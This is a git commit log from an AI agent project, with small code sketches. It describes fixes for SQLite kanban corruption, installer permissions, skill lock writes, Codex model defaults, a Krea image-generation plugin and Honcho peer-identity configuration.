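A sketch of the invariant, assuming the standard SQLite header layout (page size at bytes 16-17, in-header page count at bytes 28-31, both big-endian). The function name `check_page_count` is hypothetical, and the hook into write_txn is not shown.

```python
import os
import sqlite3
import struct


def check_page_count(db_path):
    """Raise sqlite3.DatabaseError if the file is shorter than its header claims."""
    with open(db_path, "rb") as fh:
        header = fh.read(100)
    if len(header) < 100:
        raise sqlite3.DatabaseError("file shorter than the SQLite header")
    (page_size,) = struct.unpack(">H", header[16:18])
    if page_size == 1:  # the file format encodes 65536 as 1
        page_size = 65536
    (page_count,) = struct.unpack(">I", header[28:32])
    actual_pages = os.path.getsize(db_path) // page_size
    if actual_pages < page_count:
        raise sqlite3.DatabaseError(
            f"torn extend: header says {page_count} pages, file has {actual_pages}"
        )
    return page_count, actual_pages
```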

Refs: #31208 (Bug E - same file, coordinate), #30973 (wal_autocheckpoint)
Refs: #30445, #30896, #30908 (corruption reports)
2026-05-27 14:31:55 -07:00
Stephen Chin c002668ff0 fix(kanban): add grace period to detect_crashed_workers
`detect_crashed_workers` calls `_pid_alive` on every `running` task whose
claim is held by this host. The check can transiently return False for a
freshly-spawned worker (fork → /proc-visibility lag, or reap-race
between SIGCHLD and parent reaping). When a second dispatcher ticks
inside that window it reclaims the task and spawns a duplicate worker.

Add `DEFAULT_CRASH_GRACE_SECONDS = 30` and an
`HERMES_KANBAN_CRASH_GRACE_SECONDS` env-var override.
`detect_crashed_workers` skips the liveness check when
`time.time() - started_at < grace`. The existing 15-minute claim TTL
still reclaims genuinely-crashed workers; grace only suppresses the
launch-window false positive.
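
The grace check amounts to roughly the following. The helper names are hypothetical, and falling back to the default on an unparsable env value is an assumption.

```python
import os
import time

DEFAULT_CRASH_GRACE_SECONDS = 30


def crash_grace_seconds(environ=None):
    """Resolve the grace window from the env override, else the default."""
    env = os.environ if environ is None else environ
    raw = env.get("HERMES_KANBAN_CRASH_GRACE_SECONDS")
    if raw is None:
        return float(DEFAULT_CRASH_GRACE_SECONDS)
    try:
        return max(0.0, float(raw))
    except ValueError:
        # Assumption: a malformed value falls back to the default.
        return float(DEFAULT_CRASH_GRACE_SECONDS)


def within_launch_grace(started_at, now=None, grace=None):
    """True while the worker is too young for the liveness check to be trusted."""
    now = time.time() if now is None else now
    grace = crash_grace_seconds() if grace is None else grace
    return (now - started_at) < grace
```

With a grace of 0 the predicate is never true, which is how the test fixtures keep immediate-reclaim semantics.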

`HERMES_KANBAN_CRASH_GRACE_SECONDS=0` is set on the `kanban_home`
fixture in `test_kanban_core_functionality.py` so existing tests that
assert immediate reclaim retain pre-fix semantics.

Companion to merged PR #23442 (`release_stale_claims`, closes #23025),
which addressed the same multi-dispatcher race in the stale-claim path.
Related: #20015 (`_pid_alive` false-negative behaviour).
2026-05-27 14:31:55 -07:00
Stephen Chin e83252dc46 fix(kanban): preserve original exception when write_txn rollback fails
When code inside a write_txn block raises an OperationalError that SQLite
has already auto-rolled-back (typical for "disk I/O error",
"database is locked", and "database disk image is malformed"), the
explicit ROLLBACK in write_txn.__exit__ itself raises
"cannot rollback - no transaction is active", and the secondary exception
replaces the original in the traceback. Operators see a misleading error
and lose the diagnostic information they need.

Swallow the rollback-time OperationalError so the caller always sees the
original cause.
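
A sketch of the swallow-on-rollback pattern. It uses a generator-based context manager for brevity, which is an assumption; the project's write_txn has its own `__exit__`.

```python
import contextlib
import sqlite3


@contextlib.contextmanager
def write_txn(conn):
    """Run a block inside BEGIN IMMEDIATE ... COMMIT, rolling back on error."""
    conn.execute("BEGIN IMMEDIATE")
    try:
        yield conn
    except BaseException:
        try:
            conn.execute("ROLLBACK")
        except sqlite3.OperationalError:
            # SQLite already rolled back; do not mask the original error.
            pass
        raise  # re-raises the exception from the with-block
    else:
        conn.execute("COMMIT")
```

The connection is expected to be opened with `isolation_level=None` so the explicit BEGIN/COMMIT statements are not second-guessed by the driver.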

Confirmed reproducer: tests/hermes_cli/test_kanban_db.py::
test_write_txn_preserves_original_exception_when_rollback_fails
2026-05-27 14:31:55 -07:00
Stephen Chin 5c49cd0ed0 fix(state): never silently downgrade WAL to DELETE on transient EIO
apply_wal_with_fallback() treated "disk i/o error" as a permanent
WAL-incompatibility marker, identical to "locking protocol" (NFS) and
"not authorized" (FUSE). But EIO during PRAGMA journal_mode=WAL is
typically TRANSIENT — page-cache pressure, brief lock contention,
recoverable storage hiccups — not a permanent filesystem property.

Treating transient EIO as a permanent downgrade signal produces the
mixed-journal-mode-across-processes corruption pattern:

  1. Process A opens kanban.db, hits transient EIO on the WAL pragma,
     silently downgrades to journal_mode=DELETE.
  2. Process B (no EIO) opens the same file moments later and
     successfully sets journal_mode=WAL.
  3. A writes rollback-journal frames while B writes WAL frames. SQLite
     documents this as unsupported and corrupts the file:
     https://www.sqlite.org/wal.html ("all connections to the same
     database must use the same locking protocol").

This was the root cause of repeated kanban.db corruption on hosts with
multiple gateway processes plus CLI invocations against the same DB
(observed pattern: corruption shortly after gateway startup, after the
process logged "WAL journal_mode unsupported on this filesystem (disk
I/O error) — falling back to journal_mode=DELETE"). The fallback
warning told the truth — fallback DID happen — but the premise
("unsupported on this filesystem") was wrong; the EIO was a one-shot
event and sibling processes successfully used WAL.

Fix has two layers:

1. Remove "disk i/o error" from _WAL_INCOMPAT_MARKERS. EIO now re-raises
   so callers can retry instead of silently corrupting the DB. The two
   remaining markers ("locking protocol", "not authorized") are
   deterministic per filesystem so they remain safe permanent-downgrade
   signals.

2. Belt-and-suspenders: before downgrading on ANY marker match, peek the
   on-disk journal mode. If the header says WAL, refuse to downgrade and
   re-raise the original error. This guards against any future addition
   to _WAL_INCOMPAT_MARKERS turning out to be transient in some
   environment we haven't yet seen.
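
The two layers can be sketched as a single decision function. How the real code peeks at the on-disk journal mode is not stated here; reading header bytes 18-19 (both are 2 for a WAL database) is an assumption, and the function names are hypothetical.

```python
WAL_INCOMPAT_MARKERS = ("locking protocol", "not authorized")


def header_says_wal(db_path):
    """True when the file-format version bytes (18 and 19) are both 2."""
    try:
        with open(db_path, "rb") as fh:
            header = fh.read(20)
    except OSError:
        return False
    return len(header) >= 20 and header[18] == 2 and header[19] == 2


def should_downgrade_to_delete(error_message, db_path):
    """Decide whether a failed WAL pragma may fall back to journal_mode=DELETE."""
    msg = error_message.lower()
    if not any(marker in msg for marker in WAL_INCOMPAT_MARKERS):
        return False  # e.g. "disk I/O error": re-raise so the caller can retry
    # Layer 2: never downgrade a file that is already WAL on disk.
    return not header_says_wal(db_path)
```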

Tests:

- tests/test_hermes_state_wal_fallback.py:
  * Flipped test_falls_back_on_disk_io_error → test_reraises_on_disk_io_error
    asserting EIO is re-raised, not silently swallowed.
  * Added test_does_not_downgrade_when_disk_says_wal covering the
    on-disk-header safety guard for the existing legitimate markers.

- tests/hermes_cli/test_kanban_db.py:
  * test_connect_falls_back_to_delete_on_locking_protocol now uses a
    truly-fresh DB (instead of the kanban_home fixture which pre-inits
    in WAL). On NFS the very first process touching the file legitimately
    downgrades; on a file already in WAL the new guard correctly refuses.

A standalone reproducer lives at /tmp/kanban-stress/repro_bugD_eio_wal_downgrade.py
(not committed): without fix the DB silently flips from WAL to DELETE
mid-process; with fix the EIO surfaces and the file stays WAL.

Refs: Bug D in the kanban-corruption investigation series (Bugs A and C
shipped in ebe7374f3 and e02147d5e respectively). Bug D explains every
corruption incident this week including those that survived A's
single-dispatcher mitigation, because every CLI invocation is a
separate process whose WAL pragma can transiently fail.
2026-05-27 14:31:55 -07:00
Stephen Chin 6416dd5187 fix(kanban): harden SQLite against torn-write corruption (secure_delete + cell_size_check + synchronous=FULL)
Production corruption #6 left b-tree pages with zeroed headers but intact old cell content — the Bug E pattern. This fix applies three pragma calls on every connect():

- synchronous=FULL (was NORMAL): closes the WAL-checkpoint reordering window where a crash between WAL commit and main-DB write leaves a partially-written b-tree page header. Cost is <1ms per commit on local SSD; negligible at kanban write volume.

- secure_delete=ON: forces SQLite to zero freed page bytes on disk. If a torn write or hardware fault later corrupts a page, the underlying cell content is zero, so corruption is detectable and no stale rows can resurface as live data.

- cell_size_check=ON: adds a read-side guard so corrupt cells surface as errors at read time rather than as silent wrong-data returns.

All three are connection-scoped and re-applied on every connect(). secure_delete also writes a persistent flag into the DB header on the first call against a fresh DB, making the protection durable across processes for new DBs.
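
A minimal sketch of applying and reading back the three pragmas on a connection. The helper names are hypothetical, and the real connect() does more than this.

```python
import sqlite3

HARDENING_PRAGMAS = ("synchronous", "secure_delete", "cell_size_check")


def apply_hardening_pragmas(conn):
    """Apply the three pragmas; must run outside an open transaction."""
    conn.execute("PRAGMA synchronous=FULL")
    conn.execute("PRAGMA secure_delete=ON")
    conn.execute("PRAGMA cell_size_check=ON")


def read_hardening_pragmas(conn):
    """Return the current integer value of each pragma for verification."""
    return {
        name: conn.execute(f"PRAGMA {name}").fetchone()[0]
        for name in HARDENING_PRAGMAS
    }
```

Reading the values back after connect is one way to assert that each pragma is active on a fresh connection.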

Tests added for all four required cases: each pragma active on a fresh connection, and all three re-applied after close+reopen. Also adds the required negative test (migration path does not reset pragmas).
2026-05-27 14:31:55 -07:00
kshitijk4poor 963d22cde6 test(install): harden uv-python-path regression test against future drift
Self-review follow-ups on the salvage of #22494:

W2 — Added encoding="utf-8" to read_text() calls. scripts/install.sh
contains 48 em-dash ("—") characters and ~1500 non-ASCII bytes total;
on Windows with cp1252 default locale, bare read_text() would raise
UnicodeDecodeError. Project-wide cleanup of the other 11 similar sites
across 5 install_sh test files is deferred to a separate follow-up.

W3 — Bound the branch-containment check by the function body (head
"resolve_install_layout() {" / tail "\n}\n") instead of by "next
`return 0` after the marker". scripts/install.sh has 5 additional
`return 0` statements between resolve_install_layout's first one and
EOF; if a future maintainer hoists the export above another conditional
with its own early-return or inserts an early-return between the marker
and the export, the old assertion still passes while the export is
unreachable. The body-bounded slice makes that class of regression
visible.
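
The body-bounded slice can be sketched like this. The helper name `extract_function_body` is hypothetical; the head and tail markers follow the description above.

```python
def extract_function_body(script, name):
    """Return the text from `name() {` up to the first closing "\\n}\\n"."""
    head = f"{name}() {{"
    start = script.find(head)
    if start == -1:
        raise AssertionError(f"function signature not found: {head}")
    end = script.find("\n}\n", start)
    if end == -1:
        raise AssertionError(f"closing brace not found for {name}")
    return script[start:end]
```

Assertions about the export are then made against the returned slice, so a `return 0` in some later function cannot satisfy them.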

Also added more specific assertion messages and a guard for the body
extraction to fail loudly if the function signature ever changes.
2026-05-27 13:55:51 -07:00
Wesley Simplicio 4efb40c325 fix(install): set world-readable uv python dirs for root FHS layout
When installing as root on Linux with the default FHS layout
(/usr/local/lib/hermes-agent), `uv python install` placed the managed
Python under /root/.local/share/uv/python/, which non-root users cannot
traverse.  The shared /usr/local/bin/hermes wrapper then failed for them
with "bad interpreter: Permission denied" when execing the venv python.

Export UV_PYTHON_INSTALL_DIR and UV_PYTHON_BIN_DIR to /usr/local/share/uv/
in the root-FHS branch of resolve_install_layout so the managed Python
is world-readable and the shared wrapper works for any user.

Closes #21457
2026-05-27 13:55:51 -07:00
kshitijk4poor 0537e2600d fix(skills): atomic lock write + drop dead _validate_category_name
Self-review follow-ups on the salvage of #33177 + #33188 + #33209:

W3 (real bug): lock_path.write_text was non-atomic, and the read path
silently resets data to an empty installed dict on JSONDecodeError, so a
crash mid-write could wipe ALL hub provenance, not just official-optional.
Switch to the same mkstemp + fsync + atomic_replace pattern that
_write_manifest already uses in this module.
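
A generic sketch of the mkstemp + fsync + replace pattern. It uses `os.replace` in place of the module's own `atomic_replace` helper, and the function name `write_json_atomically` is hypothetical.

```python
import json
import os
import tempfile


def write_json_atomically(path, data):
    """Write JSON so readers see either the old file or the complete new one."""
    directory = os.path.dirname(os.path.abspath(path))
    # Temp file in the same directory, so the final rename stays on one filesystem.
    fd, tmp_path = tempfile.mkstemp(dir=directory, prefix=".tmp-", suffix=".json")
    try:
        with os.fdopen(fd, "w", encoding="utf-8") as fh:
            json.dump(data, fh, indent=2)
            fh.flush()
            os.fsync(fh.fileno())  # push the bytes to disk before the rename
        os.replace(tmp_path, path)  # atomic swap on the same filesystem
    except BaseException:
        try:
            os.unlink(tmp_path)
        except OSError:
            pass
        raise
```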

W5 (dead code) — _validate_category_name had one caller on origin/main
(install_from_quarantine), swapped to _validate_install_parent_path by
#33177. Remove the now-unused definition to avoid the attractive-nuisance
of contributors picking the wrong validator.

Behavior preserved on the happy path; verified all 200 skills/hub tests
plus the three E2E scenarios (destructive restore, backfill idempotency,
adversarial nonexistent skill) still pass after both fixes.
2026-05-27 13:39:58 -07:00
wysie ee80dfdea0 fix: preserve skill packages during curator consolidation 2026-05-27 13:39:58 -07:00
wysie f040710d04 fix: backfill official optional skill provenance 2026-05-27 13:39:58 -07:00
wysie a38e283395 fix: preserve nested official skill install paths 2026-05-27 13:39:58 -07:00
kshitijk4poor 53bdef5775 test(cli): regression test for hermes update fork upstream sync (#26172)
Asserts that when `hermes update` runs on a fork whose local HEAD already
matches origin/main (so commit_count == 0), the early-return path still consults
_sync_with_upstream_if_needed() before printing "Already up to date!".

Locks in the fix from the parent commit so the upstream-sync call cannot
silently regress out of the commit_count == 0 branch.
2026-05-27 13:10:50 -07:00
Franci Penov 6f2a2f157f fix: check upstream even when origin/main has no new commits
The upstream sync logic only ran after a successful origin pull,
so forks whose origin/main was already in sync with local (but
behind upstream/main) would bail out with "Already up to date!"
without ever checking upstream.
2026-05-27 13:10:50 -07:00
Teknium e8955f222c fix(codex): drop dead model slugs that HTTP 400 on ChatGPT Pro (#33424)
DEFAULT_CODEX_MODELS shipped three slugs that the chatgpt.com Codex
backend rejects with HTTP 400 'The <slug> model is not supported when
using Codex with a ChatGPT account.' on every account tested live:

  gpt-5.2-codex
  gpt-5.1-codex-max
  gpt-5.1-codex-mini

Live verified against https://chatgpt.com/backend-api/codex/models
which returns gpt-5.5, gpt-5.4, gpt-5.4-mini, gpt-5.3-codex,
gpt-5.3-codex-spark, gpt-5.2 for ChatGPT Pro accounts.

When _fetch_models_from_api fell back to DEFAULT_CODEX_MODELS (offline
first-run, transient API failure) the picker surfaced these dead slugs
and crashed on selection. The forward-compat synthesis table chained
them downstream too.

If OpenAI re-enables them on the OAuth-backed Codex backend, live
discovery will pick them up automatically — the defaults list is only
consulted when live discovery is unavailable.

Test fixture pivoted to use gpt-5.3-codex (templated by 4 entries) as
the synthesis driver so the forward-compat test still exercises the
synthesis path.
2026-05-27 12:16:15 -07:00
teknium1 5deb384b53 chore(release): map donovan-yohan for #33263 salvage 2026-05-27 11:48:23 -07:00
Donovan Yohan c94ad89818 fix(kanban): retry corrupt-board dispatch after quarantine 2026-05-27 11:48:23 -07:00
xxxigm fc47b7285c fix(codex): omit tools key from Codex Responses kwargs when no tools registered
Salvages the transport-side fix from #32911 (@xxxigm). Closes #32892.

The openai SDK's responses.stream() / responses.parse() eagerly call
_make_tools(tools), which iterates tools without a None guard. Passing
tools=None raises TypeError: 'NoneType' object is not iterable before
any HTTP request is issued (openai==2.24.0).

PR #33042 already removed responses.stream() from our own Codex call
paths, so the specific iteration crash inside _make_tools is no longer
on the hot path. But the right API contract is to omit tools entirely
when there are no functions to expose — passing tools=None to the
backend is semantically wrong regardless of the SDK's iteration
behavior, and we'd hit it again on any future code path that hasn't
migrated off responses.stream().

This applies the transport-level part of @xxxigm's fix: move
'tools': response_tools into the if response_tools: branch so the
key is omitted when there are no tools, just like tool_choice and
parallel_tool_calls already are. Skips the run_agent.py-side
_strip_sdk_none_iterables helper from their PR — that path is now
obsolete because the SDK helper that needed defending is gone.
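
In outline, the kwargs construction looks like the sketch below. The function name and the concrete values for `tool_choice` and `parallel_tool_calls` are assumptions; only the "omit the key when there are no tools" shape is taken from this change.

```python
def build_responses_kwargs(model, input_items, response_tools=None):
    """Build request kwargs, leaving tool-related keys out when no tools exist."""
    kwargs = {"model": model, "input": input_items}
    if response_tools:
        kwargs["tools"] = response_tools
        # Assumed values, shown only to illustrate the shared branch.
        kwargs["tool_choice"] = "auto"
        kwargs["parallel_tool_calls"] = True
    return kwargs
```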

Tests
- tests/run_agent/test_codex_no_tools_nonetype.py: 6 tests trimmed
  from @xxxigm's original 13-test file. Drops the obsolete tests for
  _strip_sdk_none_iterables and _RecordingResponsesStream (helpers
  that don't exist on main anymore), keeps the transport behavior
  tests + the SDK contract sanity check that ensures we notice if
  upstream ever fixes _make_tools(None).
- 6/6 passing locally.

Co-authored-by: xxxigm <tuancanhnguyen706@gmail.com>
2026-05-27 11:46:17 -07:00
teknium1 8386f84454 chore(release): map Brixyy for #33136 salvage 2026-05-27 11:30:55 -07:00
Brixyy dc9d677d59 fix(agent): classify TypeError('NoneType ... not iterable') as retryable provider shape error
Salvages the intent of #33136 (@Brixyy) onto current main. The original PR
was written against the pre-refactor monolithic run_agent.py and added a
top-level _is_nonretryable_local_validation_error() helper. Both target
functions have since been extracted to agent/conversation_loop.py:2869,
so the salvage applies the equivalent guard inline at that canonical
location rather than reintroducing the helper.

## Why

After #33042 made our own Codex consumer structurally immune to NoneType
crashes, third-party shims, mocked clients, and any future code path that
hasn't migrated could still surface TypeError: 'NoneType' object is not
iterable as a wire-shape mismatch. The agent loop's classifier currently
treats ALL TypeError as a local programming bug and aborts non-retryable
— users on stale Telegram/gateway turns saw bare "Non-retryable error
(HTTP None)" with no recovery.

This is a provider/SDK shape mismatch, not a local programming bug. The
retry/fallback path should run, not be short-circuited.

## What

agent/conversation_loop.py: extend is_local_validation_error to exclude
TypeErrors whose message matches the NoneType-not-iterable shape (case-
insensitive, both "NoneType" and "not iterable" must appear).
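
A simplified sketch of the carve-out. The production predicate covers more cases than shown; here `is_local_validation_error` is reduced to the TypeError branch, which is an assumption, and `is_nonetype_not_iterable` is a hypothetical helper name.

```python
def is_nonetype_not_iterable(exc):
    """True for TypeErrors whose message has both 'NoneType' and 'not iterable'."""
    if not isinstance(exc, TypeError):
        return False
    msg = str(exc).lower()
    return "nonetype" in msg and "not iterable" in msg


def is_local_validation_error(exc):
    """Reduced form: TypeErrors abort, except the provider-shape carve-out."""
    return isinstance(exc, TypeError) and not is_nonetype_not_iterable(exc)
```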

tests/run_agent/test_jsondecodeerror_retryable.py:
- update the mirror predicate to match the production check
- add TestNoneTypeNotIterableIsRetryable class with 3 tests (the basic
  shape, message variants, unrelated TypeErrors still abort)
- add TestAgentLoopSourceHasNoneTypeCarveOut to enforce the source-level
  invariant matches the test mirror

## Validation

tests/run_agent/test_jsondecodeerror_retryable.py +
tests/run_agent/test_31273_402_not_retried.py → 14/14 passing

Co-authored-by: Brixyy <subrtt@gmail.com>
2026-05-27 11:30:55 -07:00
teknium1 3476509f97 chore(release): map sanghyuk-seo-nexcube for #33383 salvage 2026-05-27 11:19:55 -07:00
Sanghyuk Seo 283bb810e7 fix(agent): tolerate large codex stream prefill 2026-05-27 11:19:55 -07:00
teknium1 486d632cc2 fix(auxiliary): coerce None final.output to empty list in Codex aux adapter
Closes #33368.

`_CodexCompletionsAdapter.create()` iterates `final.output` from the
Codex Responses stream. The event-driven consumer (introduced in #33042)
always sets `final.output` to a list, so this shape can't come from our
own code path. But:

- Mocked clients in tests can return a typed Response with `output=None`
- Third-party shims / compatibility layers that bypass the consumer can
  do the same
- A future code path that wraps a different consumer could regress

The old code `getattr(final, "output", [])` returns `None` (not the
default `[]`) when the attribute EXISTS but is `None`. Iterating
`None` then raises `TypeError: 'NoneType' object is not iterable` —
the exact error logged by title-generation when this fires.

Fix: `getattr(final, "output", None) or []` — single-line defensive
coerce. Cheap; zero risk.
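
The difference between the two forms is easy to see in isolation. `SimpleNamespace` stands in for the typed Response here, and `output_items` is a hypothetical helper name.

```python
from types import SimpleNamespace


def output_items(final):
    """Return final.output as a list, treating a missing or None value as empty."""
    return getattr(final, "output", None) or []


# The getattr default only applies when the attribute is missing entirely.
final = SimpleNamespace(output=None)
old_value = getattr(final, "output", [])  # None: attribute exists, default unused
new_value = output_items(final)           # []: safe to iterate
```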

Regression test asserts the auxiliary path handles a final whose
`.output` is `None` (via monkey-patched consumer) without raising and
returns the expected chat.completions-shaped response.

Reporter: @pavegrid-1 (issue #33368).
2026-05-27 11:08:21 -07:00
Teknium 9919caff46 feat(image_gen): add Krea provider plugin (Krea 2 Medium + Large) (#33236)
* feat(image_gen): add Krea provider plugin (Krea 2 Medium + Large)

New built-in image_gen backend wrapping Krea's Krea 2 foundation
image model family. Auto-discovered like the other image_gen plugins
and appears in 'hermes tools' → Image Generation → Krea.

Krea's API is asynchronous — submit returns a job_id, poll /jobs/{id}
until terminal. The provider hides that behind the synchronous
ImageGenProvider.generate() contract: submit, poll every 2s with
light backoff (max 5s), 3-minute ceiling matching Krea's hosted-tool
timeout. Result URL is materialised to $HERMES_HOME/cache/images/
to avoid CDN-expiry 404s downstream (same fix as xAI #26942).

Models:
- krea-2-medium (default — Krea's 'start here' recommendation)
- krea-2-large

Aspect ratios map landscape→16:9, square→1:1, portrait→9:16.
Resolution: 1K (Krea's only current option).

Kwarg passthrough: seed, creativity (raw/low/medium/high), styles,
image_style_references (capped 10), moodboards (capped 1) — matches
Krea's per-request limits. Unknown kwargs are ignored.

Config knobs (config.yaml):
  image_gen.provider: krea
  image_gen.krea.model: krea-2-medium | krea-2-large
  image_gen.krea.creativity: raw | low | medium | high
Env overrides: KREA_API_KEY (required), KREA_IMAGE_MODEL.

KREA_API_KEY is registered in OPTIONAL_ENV_VARS so 'hermes setup'
prompts for it.

31 new tests; image_gen suite + picker + tools_config: 211/211.

* fix(image_gen/krea): address review feedback

- Update KREA_API_KEY setup URL to the canonical token-creation page
  (https://www.krea.ai/app/api/tokens). The previous URL returned 404.

- Fail fast on non-retryable HTTP statuses during poll. The previous
  loop retried every HTTPError for the full 180s deadline, so an auth
  (401), billing (402), forbidden (403), or not-found (404) response
  would make image_generate hang for three minutes. Only retry
  transient statuses (408/409/425/429/5xx); surface everything else
  immediately.

- Add 5 tests covering fail-fast on 401/403/404 and retry on 429/503.
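
The retry/fail-fast split above could be expressed roughly like this; the
helper name is hypothetical and only the status list comes from the commit
message:

```python
# Transient statuses named in the commit message; everything else fails fast.
RETRYABLE_STATUSES = frozenset({408, 409, 425, 429})


def is_retryable_status(status: int) -> bool:
    """Return True for statuses worth polling again, False to surface now."""
    return status in RETRYABLE_STATUSES or 500 <= status <= 599
```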

* fix(krea): point users at the real API token dashboard URL

Three call sites linked users to dashboard pages that don't exist:
- hermes_cli/config.py: https://www.krea.ai/app/api/tokens
- plugins/image_gen/krea/__init__.py get_setup_schema: https://www.krea.ai/api-keys
- plugins/image_gen/krea/__init__.py auth_required error: https://www.krea.ai/api-keys

Per Krea's own docs (https://docs.krea.ai/developers/api-keys-and-billing),
the real dashboard URL is https://www.krea.ai/settings/api-tokens. All three
sites now point there.
2026-05-27 11:01:47 -07:00
Erosika eccbbe4b1b chore(release): map adopted Honcho contributors 2026-05-27 10:49:33 -07:00
Erosika c89393b711 chore(honcho): trim peer-card fallback comment 2026-05-27 10:49:33 -07:00
Dora (kyra-nest) bcae3fcc4e fix(honcho): align user context peer perspective
Use the shared observer/target resolver for session context so peer='user' and explicit configured peer IDs query Honcho from the same assistant-observed perspective when allowed. Add regression coverage for user alias, explicit peer, and self-observer fallback.
2026-05-27 10:49:33 -07:00
David Doan 1800a1c796 fix(honcho): align peer-card read and write paths
honcho_profile(peer="user") returned an empty card even when Honcho
held a populated peer card for the user. Two independent bugs combined
to produce the symptom:

1. Read path: get_peer_card() called _fetch_peer_card(observer, target=user),
   which hits GET /peers/{observer}/card?target={user} — the observer's local
   card of the user. On self-hosted Honcho v3 this slot is empty unless writes
   also use it. The peer card lives on the user peer itself
   (GET /peers/{user}/card). Add a fallback: when the observer-target slot is
   empty and a target exists, retry against the target peer's own card.

2. Write path: set_peer_card() resolved only the target peer and called
   user_peer.set_card(card). The read path uses the assistant peer as
   observer, so writes and reads addressed different Honcho card scopes.
   Align set_peer_card() with _resolve_observer_target() so writes go to
   assistant_peer.set_card(card, target=user_peer_id), matching the read.

Both paths now use the same observer/target resolution, and the read
path additionally falls back to the target's own card for compatibility
with deployments where cards were written directly to the peer.
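
The read-path fallback can be sketched as follows, assuming a hypothetical
`fetch_card(peer, target=None)` callable in place of the real Honcho
lookup:

```python
def get_peer_card(fetch_card, observer, target):
    """Read the observer's card of the target, else the target's own card.

    fetch_card(peer, target=None) is a hypothetical stand-in for the Honcho
    request; it is assumed to return a list of card lines (possibly empty).
    """
    card = fetch_card(observer, target=target)
    if not card and target:
        # Observer-target slot is empty: retry against the target peer itself.
        card = fetch_card(target)
    return card or []
```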

Closes: related to #13375, #17124, #20729
2026-05-27 10:49:33 -07:00
Erosika 1a8e67076a fix(honcho): cover pinUserPeer + aiPeer edge cases in setup, clone, and gateway cache
Three related regressions stemming from the pinUserPeer alias landing:

- Setup wizard read host-only fields when detecting current shape but the
  parser supports root-level config and gives host pinUserPeer higher
  precedence than pinPeerName. Re-running setup could mis-detect shape
  and silently flip routing. Detection now uses the same resolver order
  as HonchoClientConfig, and each shape branch scrubs every peer-mapping
  key before writing so a stale pinUserPeer=false can't outrank a freshly
  written pinPeerName=true. Multi no longer auto-writes
  userPeerAliases={} (was silently masking root-level baselines).

- clone_honcho_for_profile inherited pinPeerName but not pinUserPeer, so
  a default profile configured with the newer key produced cloned
  profiles without the pin.

- Gateway cache-busting signature fingerprinted Honcho user-peer fields
  but not ai_peer. Since HonchoSessionManager freezes cfg.ai_peer at
  init, mid-flight aiPeer edits kept assistant writes on the old peer
  until an unrelated cache eviction. ai_peer is now part of the
  signature.
2026-05-27 10:49:33 -07:00
Erosika 939499beed chore(honcho): trim PR-history narration from docs and tests
Remove "PR #14984 / #27371 / #1969" references and "the original key /
legacy / backwards-compatible / Port #N" narration from the honcho
plugin README, tests, and one stale code comment. These artefacts age
poorly: they describe how a change happened rather than what the code
does today, and they tax readers who weren't around for the original
work.

Also drop a dangling reference to scratch/memory-plugin-ux-specs.md in
__init__.py — the file isn't in the repo or git history.

No behaviour change.
2026-05-27 10:49:33 -07:00
Erosika 6feb2afd50 fix(honcho): plug pinPeerName transition gaps
Three correctness gaps when honcho.json's identity-mapping config changes
mid-flight:

1. The gateway's agent cache signature ignored honcho identity keys, so
   editing peerName / pinPeerName / userPeerAliases / runtimePeerPrefix
   was silently dropped until an unrelated cache eviction. Extend
   _extract_cache_busting_config to fingerprint the resolved honcho
   config so the AIAgent rebuilds on the next message.

2. cmd_setup let single → multi flips orphan the pinned-pool history
   under peerName without warning. Detect the transition, warn that
   runtime users will resolve to fresh empty peers, and auto-steer to
   hybrid (alias the operator's runtime IDs back to peerName) so the
   operator's own continuity survives. yes / no overrides available.

3. README didn't document the orphaning behaviour. Add a "Migrating
   single → multi" callout under Deployment shapes.

Tests:
- TestPinTransition (test_pin_peer_name.py): fresh-manager flip resolves
  to runtime, in-process flip is gated by the per-key session cache
  (documents the gateway-cache-must-bust contract), 3 cache-bust
  signature tests for pin / aliases / prefix.
- TestProfilePeerUniqueness: two profiles pinned to distinct peerNames
  resolve to distinct peers; host-level peerName overrides root when
  pinned.
- test_single_to_multi_steers_to_hybrid_by_default and
  test_single_to_multi_yes_override_keeps_multi (test_cli.py): wizard
  guard end-to-end coverage.
2026-05-27 10:49:33 -07:00
erosika 58987cb8b1 docs(honcho): document identity-mapping config + resolver ladder + deployment shapes
PR #27371 introduced three new identity-mapping config keys
(pinPeerName, userPeerAliases, runtimePeerPrefix), but the README's
'Full Configuration Reference' didn't mention them.  Operators had
to read the source to understand the resolver, leading to predictable
support questions ("why is my user split across two peers?", "what
does pinPeerName actually pin?").

Add a new 'Identity Mapping' subsection that covers:

* The four config keys (pinUserPeer and its alias pinPeerName,
  userPeerAliases, runtimePeerPrefix) with concrete examples.

* The 7-step resolver ladder so operators can predict which peer a
  given runtime ID will land on.

* Why there's no symmetric pinAiPeer (the AI peer is already pinned
  by construction; the asymmetry is intentional).

* Host vs root semantics (host-level replaces root for maps, wipes
  with empty value).

* The three deployment shapes ('hermes honcho setup' uses these same
  shape names) with one-line guidance per shape.
2026-05-27 10:49:33 -07:00
erosika 3cf5e8225d refactor(honcho): accept pinUserPeer as backwards-compatible alias for pinPeerName
The original key 'pinPeerName' from #14984 is ambiguous: a fresh
reader can't tell whether it pins the user peer or the AI peer from
the name alone.  The resolver only ever pins the user-side
(_resolve_user_peer_id short-circuits when pin_peer_name is true; the
AI peer is already pinned by construction via aiPeer).

Add 'pinUserPeer' as the canonical alias.  Both keys land on the
same internal pin_peer_name field; precedence is host pinUserPeer →
host pinPeerName → root pinUserPeer → root pinPeerName → default.
Host-level always beats root-level regardless of alias, so a host
block can still explicitly disable a root-level pin even via the new
key.

Make _resolve_bool variadic so it can express the four-value
precedence chain.  All existing callers pass two positional args +
default keyword, which the new signature accepts unchanged.
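
One way a variadic resolver could express that chain; this is a sketch
under the assumption that unset keys arrive as None, and `resolve_bool` is
not the real `_resolve_bool` signature:

```python
def resolve_bool(*candidates, default=False):
    """Return the first candidate that is not None, else the default.

    Candidates are passed in precedence order, e.g. host pinUserPeer,
    host pinPeerName, root pinUserPeer, root pinPeerName.
    """
    for value in candidates:
        if value is not None:
            return bool(value)
    return default
```

Because an explicit False counts as set, a host-level `false` still
outranks a root-level `true`.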

Internal var name (pin_peer_name) stays the same to keep the
cherry-picked #27371 commits clean and avoid a noisy rename diff.
2026-05-27 10:49:33 -07:00
erosika 0bac880991 feat(honcho-setup): add deployment-shape step to identity-mapping wizard
The PR #27371 resolver introduced three identity-mapping config keys
(pinPeerName, userPeerAliases, runtimePeerPrefix), but operators had
no guided way to set them — they had to read the README, understand
the resolver ladder, and hand-edit honcho.json.  This commit adds an
interactive step to 'hermes honcho setup' that asks one question
('what's your deployment shape?') and writes the right combination
of keys.

Three shapes cover the realistic deployments:

* single -- pinPeerName=true.  All gateway users collapse to your
